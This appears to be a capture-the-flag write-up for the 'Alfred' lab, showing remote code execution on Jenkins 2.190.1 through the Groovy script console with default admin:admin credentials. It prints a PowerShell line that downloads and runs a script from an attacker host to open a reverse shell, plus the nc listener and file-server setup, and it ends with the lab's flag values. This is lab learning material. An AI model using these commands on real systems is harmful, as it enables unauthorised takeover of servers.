Alfred

Jenkins 2.190.1

RCE can be accomplished by creating a project (too noisy) or by using the Groovy Script - this skeleton script was pulled from HackTricks (https://book.hacktricks.xyz/pentesting/pentesting-web/jenkins)

Proof of concept

The above picture shows that RCE is possible.

Exploit

Hacktricks said we can use this:

powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');
Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

Tailored to our situation:

"powershell iex (New-Object Net.WebClient).DownloadString('http://10.2.73.217:9000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.2.73.217 -Port 4444".execute()

1. Attack Box
   1. Host the Invoke-PowerShellTcp.ps1 file cd LOCATION_OF_PS1FILE python -m http.server 9000
   2. Start a nc listener on 4444 nc -nvlp 4444
2. Jenkins UI: go to http://ip:port/scripts
   1. Use credential admin:admin if necessary
   2. Paste modified script from above.
   3. Click Run

Boom, we got shell

User Flag

79007a09481963edf2e1321abd9ae2a0

dff0f748678f280250f25a45b8046b4a